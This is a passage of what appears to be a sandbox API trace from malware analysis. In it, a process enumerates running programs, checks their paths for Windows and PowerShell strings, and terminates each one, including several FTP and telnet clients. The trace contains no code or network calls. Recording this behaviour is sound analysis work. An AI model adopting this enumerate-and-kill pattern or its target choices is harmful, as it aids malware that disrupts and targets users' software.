(lpFirst="C:\\Program Files\\Windows Defender Advanced Threat Protection\\namespace_bankruptcy.exe", lpSrch="powershell.exe") returned 0x0 [0059.962] StrStrIW (lpFirst="C:\\Program Files\\Windows Defender Advanced Threat Protection\\namespace_bankruptcy.exe", lpSrch="powershell.exe") returned 0x0 [0059.963] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.963] GetTickCount () returned 0x115078e [0059.963] GetCurrentProcessId () returned 0xf00 [0059.963] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xd38) returned 0x404 [0059.963] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.963] TerminateProcess (hProcess=0x404, uExitCode=0x115078e) returned 1 [0059.964] CloseHandle (hObject=0x404) returned 1 [0059.964] CloseHandle (hObject=0x3fc) returned 1 [0059.965] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="j-species-gerald.exe")) returned 1 [0059.965] GetCurrentProcessId () returned 0xf00 [0059.965] GetCurrentProcess () returned 0xffffffff [0059.965] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.965] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x79c) returned 0x3fc [0059.965] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Multimedia Platform\\j-species-gerald.exe" (normalized: "c:\\program files (x86)\\windows multimedia platform\\j-species-gerald.exe")) returned 0x47 [0059.965] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\j-species-gerald.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.965] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\j-species-gerald.exe", lpSrch="powershell.exe") returned 0x0 [0059.965] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\j-species-gerald.exe", lpSrch="powershell.exe") returned 0x0 [0059.965] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\j-species-gerald.exe", lpSrch="powershell.exe") returned 0x0 [0059.966] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\j-species-gerald.exe", lpSrch="powershell.exe") returned 0x0 [0059.966] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\j-species-gerald.exe", lpSrch="powershell.exe") returned 0x0 [0059.966] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.966] GetTickCount () returned 0x115078e [0059.966] GetCurrentProcessId () returned 0xf00 [0059.966] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x79c) returned 0x404 [0059.966] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.966] TerminateProcess (hProcess=0x404, uExitCode=0x115078e) returned 1 [0059.967] CloseHandle (hObject=0x404) returned 1 [0059.967] CloseHandle (hObject=0x3fc) returned 1 [0059.967] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="based.exe")) returned 1 [0059.967] GetCurrentProcessId () returned 0xf00 [0059.967] GetCurrentProcess () returned 0xffffffff [0059.967] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.967] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xd2c) returned 0x3fc [0059.967] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\MSBuild\\based.exe" (normalized: "c:\\program files\\msbuild\\based.exe")) returned 0x22 [0059.968] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\based.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.968] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\based.exe", lpSrch="powershell.exe") returned 0x0 [0059.968] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\based.exe", lpSrch="powershell.exe") returned 0x0 [0059.968] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\based.exe", lpSrch="powershell.exe") returned 0x0 [0059.968] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\based.exe", lpSrch="powershell.exe") returned 0x0 [0059.968] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\based.exe", lpSrch="powershell.exe") returned 0x0 [0059.968] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.968] GetTickCount () returned 0x115078e [0059.968] GetCurrentProcessId () returned 0xf00 [0059.968] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xd2c) returned 0x404 [0059.968] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.968] TerminateProcess (hProcess=0x404, uExitCode=0x115078e) returned 1 [0059.969] CloseHandle (hObject=0x404) returned 1 [0059.969] CloseHandle (hObject=0x3fc) returned 1 [0059.969] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers.exe")) returned 1 [0059.970] GetCurrentProcessId () returned 0xf00 [0059.970] GetCurrentProcess () returned 0xffffffff [0059.970] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.970] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xd84) returned 0x3fc [0059.970] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office\\workers.exe" (normalized: "c:\\program files\\microsoft office\\workers.exe")) returned 0x2d [0059.970] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\workers.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.970] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\workers.exe", lpSrch="powershell.exe") returned 0x0 [0059.970] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\workers.exe", lpSrch="powershell.exe") returned 0x0 [0059.970] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\workers.exe", lpSrch="powershell.exe") returned 0x0 [0059.970] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\workers.exe", lpSrch="powershell.exe") returned 0x0 [0059.970] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\workers.exe", lpSrch="powershell.exe") returned 0x0 [0059.970] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.970] GetTickCount () returned 0x115079d [0059.970] GetCurrentProcessId () returned 0xf00 [0059.970] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xd84) returned 0x404 [0059.970] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.970] TerminateProcess (hProcess=0x404, uExitCode=0x115079d) returned 1 [0059.971] CloseHandle (hObject=0x404) returned 1 [0059.971] CloseHandle (hObject=0x3fc) returned 1 [0059.971] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="legislation-blend-breeds.exe")) returned 1 [0059.972] GetCurrentProcessId () returned 0xf00 [0059.972] GetCurrentProcess () returned 0xffffffff [0059.972] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.972] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xaac) returned 0x3fc [0059.972] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Mozilla Firefox\\legislation-blend-breeds.exe" (normalized: "c:\\program files\\mozilla firefox\\legislation-blend-breeds.exe")) returned 0x3d [0059.972] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\legislation-blend-breeds.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.972] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\legislation-blend-breeds.exe", lpSrch="powershell.exe") returned 0x0 [0059.972] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\legislation-blend-breeds.exe", lpSrch="powershell.exe") returned 0x0 [0059.972] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\legislation-blend-breeds.exe", lpSrch="powershell.exe") returned 0x0 [0059.972] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\legislation-blend-breeds.exe", lpSrch="powershell.exe") returned 0x0 [0059.972] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\legislation-blend-breeds.exe", lpSrch="powershell.exe") returned 0x0 [0059.972] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.972] GetTickCount () returned 0x115079d [0059.972] GetCurrentProcessId () returned 0xf00 [0059.972] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xaac) returned 0x404 [0059.972] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.972] TerminateProcess (hProcess=0x404, uExitCode=0x115079d) returned 1 [0059.973] CloseHandle (hObject=0x404) returned 1 [0059.973] CloseHandle (hObject=0x3fc) returned 1 [0059.973] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0059.974] GetCurrentProcessId () returned 0xf00 [0059.974] GetCurrentProcess () returned 0xffffffff [0059.974] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.974] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb68) returned 0x3fc [0059.974] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Google\\3dftp.exe" (normalized: "c:\\program files (x86)\\google\\3dftp.exe")) returned 0x27 [0059.975] StrStrIW (lpFirst="C:\\Program Files (x86)\\Google\\3dftp.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.975] StrStrIW (lpFirst="C:\\Program Files (x86)\\Google\\3dftp.exe", lpSrch="powershell.exe") returned 0x0 [0059.975] StrStrIW (lpFirst="C:\\Program Files (x86)\\Google\\3dftp.exe", lpSrch="powershell.exe") returned 0x0 [0059.975] StrStrIW (lpFirst="C:\\Program Files (x86)\\Google\\3dftp.exe", lpSrch="powershell.exe") returned 0x0 [0059.975] StrStrIW (lpFirst="C:\\Program Files (x86)\\Google\\3dftp.exe", lpSrch="powershell.exe") returned 0x0 [0059.975] StrStrIW (lpFirst="C:\\Program Files (x86)\\Google\\3dftp.exe", lpSrch="powershell.exe") returned 0x0 [0059.975] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.975] GetTickCount () returned 0x115079d [0059.975] GetCurrentProcessId () returned 0xf00 [0059.975] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xb68) returned 0x404 [0059.975] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.975] TerminateProcess (hProcess=0x404, uExitCode=0x115079d) returned 1 [0059.976] CloseHandle (hObject=0x404) returned 1 [0059.976] CloseHandle (hObject=0x3fc) returned 1 [0059.976] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0059.977] GetCurrentProcessId () returned 0xf00 [0059.977] GetCurrentProcess () returned 0xffffffff [0059.977] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.977] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xdf0) returned 0x3fc [0059.977] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Multimedia Platform\\absolutetelnet.exe" (normalized: "c:\\program files (x86)\\windows multimedia platform\\absolutetelnet.exe")) returned 0x45 [0059.977] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\absolutetelnet.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.977] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\absolutetelnet.exe", lpSrch="powershell.exe") returned 0x0 [0059.977] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\absolutetelnet.exe", lpSrch="powershell.exe") returned 0x0 [0059.977] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\absolutetelnet.exe", lpSrch="powershell.exe") returned 0x0 [0059.977] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\absolutetelnet.exe", lpSrch="powershell.exe") returned 0x0 [0059.977] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\absolutetelnet.exe", lpSrch="powershell.exe") returned 0x0 [0059.977] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.977] GetTickCount () returned 0x115079d [0059.977] GetCurrentProcessId () returned 0xf00 [0059.977] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xdf0) returned 0x404 [0059.977] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.977] TerminateProcess (hProcess=0x404, uExitCode=0x115079d) returned 1 [0059.978] CloseHandle (hObject=0x404) returned 1 [0059.978] CloseHandle (hObject=0x3fc) returned 1 [0059.978] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0059.979] GetCurrentProcessId () returned 0xf00 [0059.979] GetCurrentProcess () returned 0xffffffff [0059.979] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.979] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xdd4) returned 0x3fc [0059.979] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Maintenance Service\\alftp.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\alftp.exe")) returned 0x3c [0059.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\alftp.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\alftp.exe", lpSrch="powershell.exe") returned 0x0 [0059.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\alftp.exe", lpSrch="powershell.exe") returned 0x0 [0059.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\alftp.exe", lpSrch="powershell.exe") returned 0x0 [0059.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\alftp.exe", lpSrch="powershell.exe") returned 0x0 [0059.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\alftp.exe", lpSrch="powershell.exe") returned 0x0 [0059.980] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.980] GetTickCount () returned 0x115079d [0059.980] GetCurrentProcessId () returned 0xf00 [0059.980] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xdd4) returned 0x404 [0059.980] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.980] TerminateProcess (hProcess=0x404, uExitCode=0x115079d) returned 1 [0059.981] CloseHandle (hObject=0x404) returned 1 [0059.981] CloseHandle (hObject=0x3fc) returned 1 [0059.981] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0059.982] GetCurrentProcessId () returned 0xf00 [0059.982] GetCurrentProcess () returned 0xffffffff [0059.982] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.982] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xbb0) returned 0x3fc [0059.982] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Java\\barca.exe" (normalized: "c:\\program files\\java\\barca.exe")) returned 0x1f [0059.982] StrStrIW (lpFirst="C:\\Program Files\\Java\\barca.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.982] StrStrIW (lpFirst="C:\\Program Files\\Java\\barca.exe", lpSrch="powershell.exe") returned 0x0 [0059.982] StrStrIW (lpFirst="C:\\Program Files\\Java\\barca.exe", lpSrch="powershell.exe") returned 0x0 [0059.982] StrStrIW (lpFirst="C:\\Program Files\\Java\\barca.exe", lpSrch="powershell.exe") returned 0x0 [0059.982] StrStrIW (lpFirst="C:\\Program Files\\Java\\barca.exe", lpSrch="powershell.exe") returned 0x0 [0059.982] StrStrIW (lpFirst="C:\\Program Files\\Java\\barca.exe", lpSrch="powershell.exe") returned 0x0 [0059.982] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.982] GetTickCount () returned 0x115079d [0059.982] GetCurrentProcessId () returned 0xf00 [0059.982] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xbb0) returned 0x404 [0059.982] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.982] TerminateProcess (hProcess=0x404, uExitCode=0x115079d) returned 1 [0059.983] CloseHandle (hObject=0x404) returned 1 [0059.983] CloseHandle (hObject=0x3fc) returned 1 [0059.983] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0059.984] GetCurrentProcessId () returned 0xf00 [0059.984] GetCurrentProcess () returned 0xffffffff [0059.984] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.984] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x888) returned 0x3fc [0059.984] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Maintenance Service\\bitkinex.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\bitkinex.exe")) returned 0x3f [0059.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\bitkinex.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\bitkinex.exe", lpSrch="powershell.exe") returned 0x0 [0059.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\bitkinex.exe", lpSrch="powershell.exe") returned 0x0 [0059.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\bitkinex.exe", lpSrch="powershell.exe") returned 0x0 [0059.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\bitkinex.exe", lpSrch="powershell.exe") returned 0x0 [0059.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\bitkinex.exe", lpSrch="powershell.exe") returned 0x0 [0059.985] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.985] GetTickCount () returned 0x11507ad [0059.985] GetCurrentProcessId () returned 0xf00 [0059.985] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x888) returned 0x404 [0059.985] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.985] TerminateProcess (hProcess=0x404, uExitCode=0x11507ad) returned 1 [0059.986] CloseHandle (hObject=0x404) returned 1 [0059.986] CloseHandle (hObject=0x3fc) returned 1 [0059.986] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0059.987] GetCurrentProcessId () returned 0xf00 [0059.987] GetCurrentProcess () returned 0xffffffff [0059.987] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.987] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3fc [0059.987] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Maintenance Service\\coreftp.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\coreftp.exe")) returned 0x3e [0059.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\coreftp.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\coreftp.exe", lpSrch="powershell.exe") returned 0x0 [0059.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\coreftp.exe", lpSrch="powershell.exe") returned 0x0 [0059.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\coreftp.exe", lpSrch="powershell.exe") returned 0x0 [0059.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\coreftp.exe", lpSrch="powershell.exe") returned 0x0 [0059.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\coreftp.exe", lpSrch="powershell.exe") returned 0x0 [0059.988] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.988] GetTickCount () returned 0x11507ad [0059.988] 